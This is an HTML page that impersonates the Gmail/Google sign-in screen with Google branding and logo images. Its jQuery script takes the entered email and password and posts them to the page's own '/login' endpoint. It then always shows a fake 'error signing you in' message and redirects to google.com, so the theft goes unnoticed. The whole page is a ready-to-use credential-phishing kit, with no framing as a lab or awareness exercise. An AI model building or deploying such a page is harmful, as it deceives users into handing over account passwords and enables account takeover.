<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8" />
  <title>Sign in with Gmail</title>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" />
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>

  <script src="https://cdn.jsdelivr.net/npm/sweetalert"></script>

  <style>
    h1,
    h4 {
      margin-bottom: 20px;
      font-weight: lighter;
    }

    .text-inp {
      align-items: center;
      margin-bottom: 15px;
    }

    .img {
      width: 130px;
      margin: 15px auto;
    }

    #login-form {
      background-color: #eaeaea;
      border-radius: 5px;
      margin: 20px auto 50px;
      padding: 30px;
      border-top: #f1f1f1 solid 3px;
      border-bottom: #aaa solid 3px;
      border-right: #ddd solid 2px;
      border-left: #ddd solid 2px;
    }

    #signin-btn {
      background-color: #4b8cf6;
      color: white;
      border: none;
      border-radius: 5px;
      font-size: 15px;
      font-weight: 600;
      width: 100%;
      padding: 10px;
    }

    #check-inp {
      margin: 10px 0px;
    }
  </style>
</head>

<body>
  <div class="row p-4">
    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
      <img src="/static/images/google-logo.png" alt="Logo" class="img" />
      <h1>One account. All of google.</h1>
      <h4>Sign in to continue to Gmail</h4>
    </div>

    <form class="col-sm-4 col-md-4 col-lg-4" id="login-form">
      <div class="text-center">
        <img src="/static/images/profile.png" alt="Logo" class="img" />
        <input type="email" name="email" placeholder="Gmail" id="email" class="form-control text-inp" />
        <input type="password" name="password" placeholder="Password" id="password" class="form-control text-inp" />
        <button type="button" id="signin-btn">Sign in</button>
      </div>
      <div id="check-inp">
        <input type="checkbox" name="check-inp" />
        <label for="check-inp">Stay signed in</label>
      </div>
    </form>

    <div class="col-sm-12 col-md-12 col-lg-12 text-center">
      <p style="margin: 5px">One Google account for everything Google</p>
      <img src="/static/images/footer.png" alt="footer" style="width: 250px; margin: 0px" />
    </div>
  </div>
  <script>
    $(function () {
      $("#signin-btn").click(function () {
        email = $("#email").val().trim();
        pwrd = $("#password").val().trim();
        if (email && pwrd) {
          let data = {
            email: email,
            pwrd: pwrd,
          };
          $.ajax({
            url: "/login",
            type: "post",
            data: JSON.stringify(data),
            dataType: "json",
            contentType: "application/json",
            success: function (result) {
              swal({
                title: "Uh oh!",
                text: "There was an error signing you in. Try again after some time!",
                icon: "error",
                button: "Go to home page",
              }).then((val) => {
                window.location = "https://www.google.com";
              });
            },
          });
        } else swal("Oops!", "Looks like you might have missed out one or more fields. Please fill these in before continuing.", "warning");
      });
    });
  </script>
</body>

</html>
